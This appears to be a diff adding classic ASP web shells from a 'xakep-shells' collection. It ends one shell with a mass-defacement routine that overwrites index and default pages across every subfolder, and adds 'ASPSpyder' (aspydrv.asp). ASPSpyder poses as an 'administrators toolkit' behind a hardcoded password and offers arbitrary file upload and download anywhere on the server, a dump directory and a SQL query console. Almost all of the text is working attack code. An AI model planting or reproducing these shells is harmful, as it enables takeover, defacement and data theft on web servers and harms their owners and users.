Stream.LoadFromFile strFileName
|
||||
Response.BinaryWrite Stream.Read
|
||||
Response.Flush
|
||||
Stream.Close
|
||||
Set Stream = Nothing
|
||||
Case "upload"
|
||||
If Request.QueryString("processupload") <> "yes" Then
|
||||
Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipart/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&processupload=yes&path=" & Request.QueryString("path") & """>"
|
||||
Response.Write "<TABLE BORDER=0>"
|
||||
Response.Write "<tr><td><font face=""arial"" size=""2""><b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td></tr>"
|
||||
Response.Write "<tr><td align=""center""><font face=""arial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
|
||||
Response.Write "</TABLE>"
|
||||
Else
|
||||
Set Uploader = New FileUploader
|
||||
Uploader.Upload()
|
||||
If Uploader.Files.Count = 0 Then
|
||||
Response.Write "File(s) not uploaded."
|
||||
Else
|
||||
For Each File In Uploader.Files.Items
|
||||
File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\")
|
||||
Response.Write "File Uploaded: " & File.FileName & "<br>"
|
||||
Response.Write "Size: " & File.FileSize & " bytes<br>"
|
||||
Response.Write "Type: " & File.ContentType & "<br><br>"
|
||||
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
|
||||
Next
|
||||
End If
|
||||
End If
|
||||
Case "mass"
|
||||
checa = checking(cprthtml,keydec)
|
||||
Call hdr()
|
||||
Response.Write copyright & onlinehelp
|
||||
Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
|
||||
On Error Resume Next
|
||||
Set MonRep = ObjFSO.GetFolder(caminhodomass)
|
||||
Set ColFolders = MonRep.SubFolders
|
||||
for each folderItem in ColFolders
|
||||
destino1 = folderItem.path & "\index.htm"
|
||||
destino2 = folderItem.path & "\index.html"
|
||||
destino3 = folderItem.path & "\index.asp"
|
||||
destino4 = folderItem.path & "\index.cfm"
|
||||
destino5 = folderItem.path & "\index.php"
|
||||
destino6 = folderItem.path & "\default.htm"
|
||||
destino7 = folderItem.path & "\default.html"
|
||||
destino8 = folderItem.path & "\default.asp"
|
||||
destino9 = folderItem.path & "\default.cfm"
|
||||
destino10 = folderItem.path & "\default.php"
|
||||
MeuArquivo.Copy(destino1)
|
||||
MeuArquivo.Copy(destino2)
|
||||
MeuArquivo.Copy(destino3)
|
||||
MeuArquivo.Copy(destino4)
|
||||
MeuArquivo.Copy(destino5)
|
||||
MeuArquivo.Copy(destino6)
|
||||
MeuArquivo.Copy(destino7)
|
||||
MeuArquivo.Copy(destino8)
|
||||
MeuArquivo.Copy(destino9)
|
||||
MeuArquivo.Copy(destino10)
|
||||
Response.Write "<table><tr><td><font face='arial' size='2'><DIR> " & folderItem.path & "</td>"
|
||||
If Err.Number = 0 Then
|
||||
Response.Write "<td valign='baseline'> <font face='arial' size='2' color='green'>DONE!</font></td></tr>"
|
||||
Else
|
||||
Response.Write "<td valign='baseline'> <font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr></table>"
|
||||
End If
|
||||
Err.Number = 0
|
||||
Response.Flush
|
||||
If metodo = "brute" Then
|
||||
Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo)
|
||||
End If
|
||||
next
|
||||
End Sub
|
||||
Sub brutemass(caminho,massaction)
|
||||
If massaction = "test" Then
|
||||
On Error Resume Next
|
||||
Set MonRep = ObjFSO.GetFolder(caminho)
|
||||
Set ColFolders = MonRep.SubFolders
|
||||
Set ColFiles0 = MonRep.Files
|
||||
for each folderItem in ColFolders
|
||||
Set TotalFolders = ObjFSO.GetFolder(folderItem.path)
|
||||
Set EachFolder = TotalFolders.SubFolders
|
||||
Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
|
||||
maindestino = folderItem.path & "\"
|
||||
MeuArquivo.Copy(maindestino)
|
||||
Response.Write "<tr><td><b><font face='arial' size='2'><DIR> " & maindestino & "</b></td>"
|
||||
If Err.Number = 0 Then
|
||||
Response.Write "<td valign='baseline'> <font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
|
||||
Else
|
||||
Response.Write "<td valign='baseline'> <font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
|
||||
End If
|
||||
Err.Number = 0
|
||||
Response.Flush
|
||||
If EachFolder.count > 0 Then
|
||||
masscontador = 0
|
||||
for each subpasta in EachFolder
|
||||
masscontador = masscontador + 1
|
||||
destino = subpasta.path & "\"
|
||||
If masscontador = 1 Then
|
||||
destinofinal = destino
|
||||
pathfinal = subpasta.path
|
||||
Err.Number = 0
|
||||
MeuArquivo.Copy(destinofinal)
|
||||
Response.Write "<tr><td><font face='arial' size='2'><DIR> " & showobj(pathfinal) & "</td>"
|
||||
If Err.Number = 0 Then
|
||||
Response.Write "<td valign='baseline'> <font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
|
||||
Else
|
||||
Response.Write "<td valign='baseline'> <font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
|
||||
End If
|
||||
Err.Number = 0
|
||||
Response.Flush
|
||||
Else
|
||||
MeuArquivo.Copy(destino)
|
||||
Response.Write "<tr><td><font face='arial' size='2'><DIR> " & showobj(subpasta.path) & "</td>"
|
||||
If Err.Number = 0 Then
|
||||
Response.Write "<td valign='baseline'> <font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
|
||||
Else
|
||||
Response.Write "<td valign='baseline'> <font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
|
||||
End If
|
||||
Err.Number = 0
|
||||
Response.Flush
|
||||
End If
|
||||
next
|
||||
masscontador = 0
|
||||
End If
|
||||
Response.Write "</table><br>"
|
||||
Call brutemass(folderItem.path & "\","test")
|
||||
next
|
||||
Set MonRep = Nothing
|
||||
Set ColFolders = Nothing
|
||||
Set ColFiles0 = Nothing
|
||||
Else
|
||||
If Request.Form.Count = 0 Then
|
||||
Response.Write "<font face=""arial"" size=""2""><br><br><b>Brute:</b> copia os arquivos do deface para todas as pastas e subpastas (todos os níveis) do diretório escolhido (mais demorado). O tempo do deface vai variar de acordo com o numero TOTAL de diretórios.<br><br>"
|
||||
Response.Write "<b>Single:</b> copia os arquivos do deface apenas para as pastas (primeiro nível) do diretório escolhido. Não inclui subpastas.<br><br>"
|
||||
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">"
|
||||
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
|
||||
Response.Write "<center><font face=""arial"" size=""2"">Insira o código:<br>"
|
||||
Response.Write "<textarea cols='65' rows='15' name=""content""></textarea><br>"
|
||||
Response.Write "<input type=""radio"" name=""massopt"" value=""brute"" checked>Brute "
|
||||
Response.Write "<input type=""radio"" name=""massopt"" value=""single"">Single<br>"
|
||||
Response.Write "<input type=""submit"" value=""w00t!""></center>"
|
||||
Response.Write "</form>"
|
||||
Else
|
||||
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
|
||||
patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
|
||||
arquivomassdfc = patharquivotxt & "teste.txt"
|
||||
Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
|
||||
vetordelinhas = Split(Request.Form("content"),VbCrLf)
|
||||
For i = 0 To UBound(vetordelinhas)
|
||||
Arquivotxt.WriteLine(vetordelinhas(i))
|
||||
Next
|
||||
Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
|
||||
|
||||
If Request.Form("massopt") = "single" Then
|
||||
Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
|
||||
ElseIf Request.Form("massopt") = "brute" Then
|
||||
Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
|
||||
End If
|
||||
End If
|
||||
End If
|
||||
End Sub
|
||||
If Trim(Request.QueryString("massact")) = "test" Then
|
||||
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
|
||||
patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
|
||||
arquivo = patharquivotxt & "_vti_cnf.log"
|
||||
Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
|
||||
Set MeuArquivo = ObjFSO.GetFile(arquivo)
|
||||
Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
|
||||
ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
|
||||
Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
|
||||
End If
|
||||
Case Else
|
||||
checa = checking(cprthtml,keydec)
|
||||
Call hdr()
|
||||
Response.Write copyright & onlinehelp
|
||||
Call showcontent()
|
||||
End Select
|
||||
If Err.Number <> 0 Then
|
||||
Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse o <b>ONLINE HELP</b> para a explicação do erro"
|
||||
End If
|
||||
Response.Write endcode
|
||||
%>
|
1190
xakep-shells/ASP/Zehir 4.asp.txt
Normal file
1190
xakep-shells/ASP/Zehir 4.asp.txt
Normal file
File diff suppressed because it is too large
Load diff
828
xakep-shells/ASP/aspydrv.asp.txt
Normal file
828
xakep-shells/ASP/aspydrv.asp.txt
Normal file
|
@ -0,0 +1,828 @@
|
|||
<%
|
||||
Function BufferContent(data)
|
||||
Dim strContent(64)
|
||||
Dim i
|
||||
ClearString strContent
|
||||
For i = 1 To LenB(data)
|
||||
AddString strContent,Chr(AscB(MidB(data,i,1)))
|
||||
Next
|
||||
BufferContent = fnReadString(strContent)
|
||||
End Function
|
||||
|
||||
Sub ClearString(part)
|
||||
Dim index
|
||||
For index = 0 to 64
|
||||
part(index)=""
|
||||
Next
|
||||
End Sub
|
||||
|
||||
Sub AddString(part,newString)
|
||||
Dim tmp
|
||||
Dim index
|
||||
part(0) = part(0) & newString
|
||||
If Len(part(0)) > 64 Then
|
||||
index=0
|
||||
tmp=""
|
||||
Do
|
||||
tmp=part(index) & tmp
|
||||
part(index) = ""
|
||||
index = index + 1
|
||||
Loop until part(index) = ""
|
||||
part(index) = tmp
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Function fnReadString(part)
|
||||
Dim tmp
|
||||
Dim index
|
||||
tmp = ""
|
||||
For index = 0 to 64
|
||||
If part(index) <> "" Then
|
||||
tmp = part(index) & tmp
|
||||
End If
|
||||
Next
|
||||
FnReadString = tmp
|
||||
End Function
|
||||
|
||||
|
||||
Class FileUploader
|
||||
Public Files
|
||||
Private mcolFormElem
|
||||
Private Sub Class_Initialize()
|
||||
Set Files = Server.CreateObject("Scripting.Dictionary")
|
||||
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
|
||||
End Sub
|
||||
|
||||
Private Sub Class_Terminate()
|
||||
If IsObject(Files) Then
|
||||
Files.RemoveAll()
|
||||
Set Files = Nothing
|
||||
End If
|
||||
If IsObject(mcolFormElem) Then
|
||||
mcolFormElem.RemoveAll()
|
||||
Set mcolFormElem = Nothing
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Public Property Get Form(sIndex)
|
||||
Form = ""
|
||||
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
|
||||
End Property
|
||||
|
||||
Public Default Sub Upload()
|
||||
Dim biData, sInputName
|
||||
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
|
||||
Dim nPosFile, nPosBound
|
||||
biData = Request.BinaryRead(Request.TotalBytes)
|
||||
nPosBegin = 1
|
||||
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
|
||||
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
|
||||
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
|
||||
nDataBoundPos = InstrB(1, biData, vDataBounds)
|
||||
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
|
||||
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
|
||||
nPos = InstrB(nPos, biData, CByteString("name="))
|
||||
nPosBegin = nPos + 6
|
||||
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
|
||||
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
|
||||
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
|
||||
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
|
||||
If nPosFile <> 0 And nPosFile < nPosBound Then
|
||||
Dim oUploadFile, sFileName
|
||||
Set oUploadFile = New UploadedFile
|
||||
nPosBegin = nPosFile + 10
|
||||
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
|
||||
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
|
||||
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
|
||||
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
|
||||
nPosBegin = nPos + 14
|
||||
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
|
||||
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
|
||||
nPosBegin = nPosEnd+4
|
||||
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
|
||||
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
|
||||
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
|
||||
Else
|
||||
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
|
||||
nPosBegin = nPos + 4
|
||||
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
|
||||
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
|
||||
End If
|
||||
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
|
||||
Loop
|
||||
End Sub
|
||||
|
||||
'String to byte string conversion
|
||||
Private Function CByteString(sString)
|
||||
Dim nIndex
|
||||
For nIndex = 1 to Len(sString)
|
||||
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
|
||||
Next
|
||||
End Function
|
||||
|
||||
'Byte string to string conversion
|
||||
Private Function CWideString(bsString)
|
||||
Dim nIndex
|
||||
CWideString =""
|
||||
For nIndex = 1 to LenB(bsString)
|
||||
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
|
||||
Next
|
||||
End Function
|
||||
End Class
|
||||
|
||||
|
||||
Class UploadedFile
|
||||
Public ContentType
|
||||
Public FileName
|
||||
Public FileData
|
||||
Public Property Get FileSize()
|
||||
FileSize = LenB(FileData)
|
||||
End Property
|
||||
|
||||
Public Sub SaveToDisk(sPath)
|
||||
Dim oFS, oFile
|
||||
Dim nIndex
|
||||
If sPath = "" Or FileName = "" Then Exit Sub
|
||||
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
|
||||
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
|
||||
If Not oFS.FolderExists(sPath) Then Exit Sub
|
||||
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
|
||||
' output mechanism modified for buffering
|
||||
oFile.Write BufferContent(FileData)
|
||||
oFile.Close
|
||||
End Sub
|
||||
|
||||
Public Sub SaveToDatabase(ByRef oField)
|
||||
If LenB(FileData) = 0 Then Exit Sub
|
||||
If IsObject(oField) Then
|
||||
oField.AppendChunk FileData
|
||||
End If
|
||||
End Sub
|
||||
End Class
|
||||
|
||||
' Create the FileUploader
|
||||
IF REQUEST.QueryString("upload")="@" THEN
|
||||
Dim Uploader, File
|
||||
Set Uploader = New FileUploader
|
||||
|
||||
' This starts the upload process
|
||||
Uploader.Upload()
|
||||
|
||||
%>
|
||||
<html><title>ASPYDrvsInfo</title>
|
||||
<style>
|
||||
<!--
|
||||
A:link {font-style: text-decoration: none; color: #c8c8c8}
|
||||
A:visited {font-style: text-decoration: none; color: #777777}
|
||||
A:active {font-style: text-decoration: none; color: #ff8300}
|
||||
A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
|
||||
* {scrollbar-base-color:#777777;
|
||||
scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
|
||||
scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
|
||||
input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
|
||||
//-->
|
||||
</style>
|
||||
<body bgcolor=black text=white>
|
||||
<BR><BR><BR>
|
||||
<center><table bgcolor="#505050" cellpadding=4>
|
||||
<tr><td><Font face=arial size=-1>File upload Information:</font>
|
||||
</td></tr><tr><td bgcolor=black ><table>
|
||||
<%
|
||||
|
||||
' Check if any files were uploaded
|
||||
If Uploader.Files.Count = 0 Then
|
||||
Response.Write "File(s) not uploaded."
|
||||
Else
|
||||
' Loop through the uploaded files
|
||||
For Each File In Uploader.Files.Items
|
||||
File.SaveToDisk Request.QueryString("txtpath")
|
||||
Response.Write "<TR><TD> </TD></TR><tr><td><font color=gray>File Uploaded: </font></td><td>" & File.FileName & "</td></tr>"
|
||||
Response.Write "<tr><td><font color=gray>Size: </font></td><td>" & Int(File.FileSize/1024)+1 & " kb</td></tr>"
|
||||
Response.Write "<tr><td><font color=gray>Type: </font></td><td>" & File.ContentType & "</td></tr>"
|
||||
Next
|
||||
End If
|
||||
%>
|
||||
<TR><TD> </TD></TR></table>
|
||||
</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=Request.QueryString("txtpath")%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
|
||||
<%
|
||||
response.End() '---- XXX
|
||||
END IF
|
||||
'--------
|
||||
ON ERROR RESUME NEXT
|
||||
Response.Buffer = True
|
||||
password = "lol" ' <---Your password here
|
||||
|
||||
If request.querystring("logoff")="@" then
|
||||
session("shagman")="" ' Logged off
|
||||
session("dbcon")="" ' Database Connection
|
||||
session("txtpath")="" ' any pathinfo
|
||||
end if
|
||||
|
||||
If (session("shagman")<>password) and Request.form("code")="" Then
|
||||
%>
|
||||
<body bgcolor=black><center><BR><BR><BR><BR><FONT face=arial size=-2 color=#ff8300>ADMINSTRATORS TOOLKIT</FONT><BR><BR><BR>
|
||||
<table><tr><td>
|
||||
<FORM method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" >
|
||||
<table bgcolor=#505050 width="20%" cellpadding=20 ><tr><td bgcolor=#303030 align=center >
|
||||
<INPUT type=password name=code ></td><td><INPUT name=submit type=submit value=" Access ">
|
||||
</td></tr></table>
|
||||
</td></tr><tr><td align=right>
|
||||
<font color=white size=-2 face=arial >ASPSpyder Apr2003</font></td></tr>
|
||||
</td></tr></table></FORM>
|
||||
<%If request.querystring("logoff")="@" then%>
|
||||
<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
|
||||
<%end if%>
|
||||
<center>
|
||||
<%
|
||||
Response.END
|
||||
End If
|
||||
If Request.form("code") = password or session("shagman") = password Then
|
||||
session("shagman") = password
|
||||
Else
|
||||
Response.Write "<BR><B><P align=center><font color=red ><b>ACCESS DENIED</B></font><BR><font color=Gray >Copyright 2003 Vela iNC.</font></p>"
|
||||
Response.END
|
||||
End If
|
||||
|
||||
server.scriptTimeout=180
|
||||
set fso = Server.CreateObject("Scripting.FileSystemObject")
|
||||
mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME"))
|
||||
mapPathLen = len(mapPath)
|
||||
|
||||
if session(myScriptName) = "" then
|
||||
for x = mapPathLen to 0 step -1
|
||||
myScriptName = mid(mapPath,x)
|
||||
if instr(1,myScriptName,"\")>0 then
|
||||
myScriptName = mid(mapPath,x+1)
|
||||
x=0
|
||||
session(myScriptName) = myScriptName
|
||||
end if
|
||||
next
|
||||
Else
|
||||
myScriptName = session(myScriptName)
|
||||
end if
|
||||
|
||||
|
||||
wwwRoot = left(mapPath, mapPathLen - len(myScriptName))
|
||||
Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files will be DUMPED Too and From
|
||||
|
||||
if len(Request.querystring("txtpath"))=3 then
|
||||
pathname = left(Request.querystring("txtpath"),2) & "\" & Request.form("Fname")
|
||||
else
|
||||
pathname = Request.querystring("txtpath") & "\" & Request.form("Fname")
|
||||
end if
|
||||
|
||||
If Request.Form("txtpath") = "" Then
|
||||
MyPath = Request.QueryString("txtpath")
|
||||
Else
|
||||
MyPath = Request.Form("txtpath")
|
||||
End If
|
||||
|
||||
' ---Path correction routine
|
||||
If len(MyPath)=1 then MyPath=MyPath & ":\"
|
||||
If len(MyPath)=2 then MyPath=MyPath & "\"
|
||||
If MyPath = "" Then MyPath = wwwRoot
|
||||
If not fso.FolderExists(MyPath) then
|
||||
Response.Write "<font face=arial size=+2>Non-existing path specified.<BR>Please use browser back button to continue !"
|
||||
Response.end
|
||||
end if
|
||||
|
||||
set folder = fso.GetFolder(MyPath)
|
||||
|
||||
if fso.GetFolder(Target) = false then
|
||||
Response.Write "<font face=arial size=-2 color=red>Please create your target directory for copying files as it does not exist. </font><font face=arial size=-1 color=red>" & Target & "<BR></font>"
|
||||
else
|
||||
set fileCopy = fso.GetFolder(Target)
|
||||
end if
|
||||
|
||||
|
||||
If Not(folder.IsRootFolder) Then
|
||||
If len(folder.ParentFolder)>3 then
|
||||
showPath = folder.ParentFolder & "\" & folder.name
|
||||
Else
|
||||
showPath = folder.ParentFolder & folder.name
|
||||
End If
|
||||
Else
|
||||
showPath = left(MyPath,2)
|
||||
End If
|
||||
|
||||
MyPath=showPath
|
||||
showPath=MyPath & "\"
|
||||
' ---Path correction routine-DONE
|
||||
|
||||
set drv=fso.GetDrive(left(MyPath,2))
|
||||
|
||||
if Request.Form("cmd")="Download" then
|
||||
if Request.Form("Fname")<>"" then
|
||||
Response.Buffer = True
|
||||
Response.Clear
|
||||
strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname")
|
||||
Set Sys = Server.CreateObject( "Scripting.FileSystemObject" )
|
||||
Set Bin = Sys.OpenTextFile( strFileName, 1, False )
|
||||
Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Request.Form("Fname") )
|
||||
Response.ContentType = "application/octet-stream"
|
||||
While Not Bin.AtEndOfStream
|
||||
Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) )
|
||||
Wend
|
||||
Bin.Close : Set Bin = Nothing
|
||||
Set Sys = Nothing
|
||||
Else
|
||||
err.number=500
|
||||
err.description="Nothing selected for download..."
|
||||
End if
|
||||
End if
|
||||
%>
|
||||
<html>
|
||||
<style>
|
||||
<!--
|
||||
A:link {font-style: text-decoration: none; color: #c8c8c8}
|
||||
A:visited {font-style: text-decoration: none; color: #777777}
|
||||
A:active {font-style: text-decoration: none; color: #ff8300}
|
||||
A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
|
||||
* {scrollbar-base-color:#777777;
|
||||
scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
|
||||
scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
|
||||
input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
|
||||
//-->
|
||||
</style>
|
||||
<%
|
||||
'QUERY ANALYSER -- START
|
||||
if request.QueryString("qa")="@" then
|
||||
'-------------
|
||||
sub getTable(mySQL)
|
||||
if mySQL="" then
|
||||
exit sub
|
||||
end if
|
||||
on error resume next
|
||||
Response.Buffer = True
|
||||
Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
|
||||
myConnectionString=session("dbCon")
|
||||
Set myDBConnection = Server.CreateObject("ADODB.Connection")
|
||||
myDBConnection.Open myConnectionString
|
||||
myFlag = False
|
||||
myFlag = errChk()
|
||||
set rs = Server.CreateObject("ADODB.Recordset")
|
||||
rs.cursorlocation = 3
|
||||
rs.open mySQL, myDBConnection
|
||||
myFlag = errChk()
|
||||
|
||||
if RS.properties("Asynchronous Rowset Processing") = 16 then
|
||||
For i = 0 To rs.Fields.Count - 1
|
||||
myFields = myFields & "<TD><font color=#eeeeee size=2 face=""Verdana, Arial, Helvetica, sans-serif"">" & rs.Fields(i).Name & "</font></TD>"
|
||||
Next
|
||||
myTitle = "<font color=gray size=6 face=webdings>?</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font> <font color=gray><TT>(" & rs.RecordCount & " row(s) affected)</TT><br>"
|
||||
rs.MoveFirst
|
||||
rs.PageSize=mNR
|
||||
if int(rs.RecordCount/mNR) < mPage then mPage=1
|
||||
rs.AbsolutePage = mPage
|
||||
Response.Write myTitle & "</td><td> "
|
||||
if mPage=1 Then Response.Write("<input type=button name=btnPagePrev value="" << "" DISABLED>") else Response.Write("<input type=button name=btnPagePrev value="" << "">")
|
||||
Response.Write "<select name=cmbPageSelect>"
|
||||
For x = 1 to rs.PageCount
|
||||
if x=mPage Then Response.Write("<option value=" & x & " SELECTED>" & x & "</option>") else Response.Write("<option value=" & x & ">" & x & "</option>")
|
||||
Next
|
||||
Response.Write "</select><input type=hidden name=mPage value=" & mPage & ">"
|
||||
if mPage = rs.PageCount Then Response.Write("<input type=button name=btnPageNext value="" >> "" DISABLED>") else Response.Write("<input type=button name=btnPageNext value="" >> "">")
|
||||
Response.Write " <font color=gray>Displaying <input type=text size=" & Len(mNR) & " name=txtNoRecords value=" & mNR & "> records at a time.</font>"
|
||||
response.Write "</td><TABLE border=0 bgcolor=#999999 cellpadding=2><TR align=center valign=middle bgcolor=#777777>" & myFields
|
||||
|
||||
For x = 1 to rs.PageSize
|
||||
If Not rs.EOF Then
|
||||
response.Write "<TR>"
|
||||
For i = 0 to rs.Fields.Count - 1
|
||||
response.Write "<TD bgcolor=#dddddd>" & server.HTMLEncode(rs(i)) & "</TD>"
|
||||
Next
|
||||
response.Write "</TR>"
|
||||
response.Flush()
|
||||
rs.MoveNext
|
||||
Else
|
||||
x=rs.PageSize
|
||||
End If
|
||||
Next
|
||||
response.Write "</Table>"
|
||||
myFlag = errChk()
|
||||
|
||||
else
|
||||
if not myFlag then
|
||||
myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font> <font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
|
||||
response.Write myTitle
|
||||
end if
|
||||
end if
|
||||
set myDBConnection = nothing
|
||||
set rs2 = nothing
|
||||
set rs = nothing
|
||||
|
||||
End sub
|
||||
|
||||
sub getXML(mySQL)
|
||||
if mySQL="" then
|
||||
exit sub
|
||||
end if
|
||||
on error resume next
|
||||
Response.Buffer = True
|
||||
Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
|
||||
myConnectionString=session("dbCon")
|
||||
Set myDBConnection = Server.CreateObject("ADODB.Connection")
|
||||
myDBConnection.Open myConnectionString
|
||||
myFlag = False
|
||||
myFlag = errChk()
|
||||
set rs = Server.CreateObject("ADODB.Recordset")
|
||||
rs.cursorlocation = 3
|
||||
rs.open mySQL, myDBConnection
|
||||
myFlag = errChk()
|
||||
if RS.properties("Asynchronous Rowset Processing") = 16 then
|
||||
Response.Write "<font color=#55ff55 size=4 face=webdings>i</font><font color=#cccccc> Copy paste this code and save as '.xml '</font></td></tr><tr><td>"
|
||||
Response.Write "<textarea cols=75 name=txtXML rows=15>"
|
||||
rs.MoveFirst
|
||||
response.Write vbcrlf & "<?xml version=""1.0"" ?>"
|
||||
response.Write vbcrlf & "<TableXML>"
|
||||
Do While Not rs.EOF
|
||||
response.Write vbcrlf & "<Column>"
|
||||
For i = 0 to rs.Fields.Count - 1
|
||||
response.Write vbcrlf & "<" & rs.Fields(i).Name & ">" & rs(i) & "</" & rs.Fields(i).Name & ">" & vbcrlf
|
||||
response.Flush()
|
||||
Next
|
||||
response.Write "</Column>"
|
||||
rs.MoveNext
|
||||
Loop
|
||||
response.Write "</TableXML>"
|
||||
response.Write "</textarea>"
|
||||
myFlag = errChk()
|
||||
|
||||
else
|
||||
if not myFlag then
|
||||
myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font> <font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
|
||||
response.Write myTitle
|
||||
end if
|
||||
end if
|
||||
End sub
|
||||
|
||||
Function errChk()
|
||||
if err.Number <> 0 and err.Number <> 13 then
|
||||
dim myText
|
||||
myText = "<font color=#ff8300 size=4 face=webdings>x</font><font color=red size=2 face=""Verdana, Arial, Helvetica, sans-serif""> " & err.Description & "</font><BR>"
|
||||
response.Write myText
|
||||
err.Number = 0
|
||||
errChk = True
|
||||
end if
|
||||
end Function
|
||||
|
||||
Dim myQuery,mPage,mNR
|
||||
myQuery = request.Form("txtSQL")
|
||||
if request.form("txtCon") <> "" then session("dbcon") = request.form("txtCon")
|
||||
if request.QueryString("txtpath") then session("txtpath")=request.QueryString("txtpath")
|
||||
mPage=cint(request.Form("mPage"))
|
||||
if mPage<1 then mPage=1
|
||||
mNR=cint(request.Form("txtNoRecords"))
|
||||
if mNR<1 then mNR=30
|
||||
%>
|
||||
